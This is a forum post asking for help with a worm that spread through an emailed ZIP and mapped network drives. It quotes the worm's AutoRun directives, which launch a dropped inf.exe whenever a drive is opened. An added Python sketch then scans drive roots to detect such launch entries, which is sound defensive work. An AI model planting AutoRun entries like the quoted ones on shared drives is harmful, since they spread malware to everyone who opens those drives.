Got a nasty virus on our network at work yesterday after someone opened a .ZIP file in an email titled "Mejores Amigos". The code apparently hijacks the user's Outlook contacts, grabs some malicious code from the web, then infects the PC and any network drives mapped to the PC, dropping an inf.exe file on all of the mapped drives, which then runs the next time someone else uses that drive. Fortunately you have to either access a shared mapped drive for your PC to be infected, or be the genius that opens that email and zip file. It appears to be using MSN Messenger and/or Morpheus to pull the malicious code that starts the problems.
The inf.exe file reads as follows:
[autorun]
open= "inf.exe"
icon= "C:\WINDOWS\system32\SHELL32.dll,8"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command= "inf.exe"
shell\open\default=1
Any assistance would be greatly appreciated!
Thanks,
King
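
An added example, not part of the original post: a Python sketch that checks the root of each mapped drive for an AutoRun file and lists the directives that launch a program, such as the open= and shell\open\command= lines quoted above. It assumes the quoted text is stored as autorun.inf in the drive root (the standard Windows AutoRun file name); the function names and the sample input are constructed for illustration.

```python
import os
import re

# [autorun] keys that make Windows launch a program from the drive.
EXEC_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)
QUOTES = "\"'\u201c\u201d "  # straight and typographic quotes, plus spaces

def autorun_targets(text):
    """Return (key, target) pairs for every launch directive in [autorun]."""
    hits, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            if EXEC_KEY.match(key.strip()):
                hits.append((key.strip().lower(), value.strip().strip(QUOTES)))
    return hits

def scan_roots(roots):
    """Map each autorun.inf found in the given drive/share roots to its launch directives."""
    report = {}
    for root in roots:
        path = os.path.join(root, "autorun.inf")
        try:
            with open(path, "rb") as fh:
                data = fh.read()
        except OSError:
            continue  # no autorun.inf here, or the drive is not reachable
        utf16 = data[:2] in (b"\xff\xfe", b"\xfe\xff")
        hits = autorun_targets(data.decode("utf-16" if utf16 else "latin-1"))
        if hits:
            report[path] = hits
    return report

# Constructed sample: the directives quoted in the post above.
SAMPLE = ('[autorun]\nopen= "inf.exe"\n'
          'icon= "C:\\WINDOWS\\system32\\SHELL32.dll,8"\n'
          'action=Abrir carpeta para ver archivos\n'
          'shell\\open=Abrir carpeta para ver archivos\n'
          'shell\\open\\command= "inf.exe"\nshell\\open\\default=1\n')

if __name__ == "__main__":
    for key, target in autorun_targets(SAMPLE):
        print(key, "->", target)
```

Pass scan_roots the list of mapped drive roots to check; any path it reports names a file that launches a program when the drive is opened.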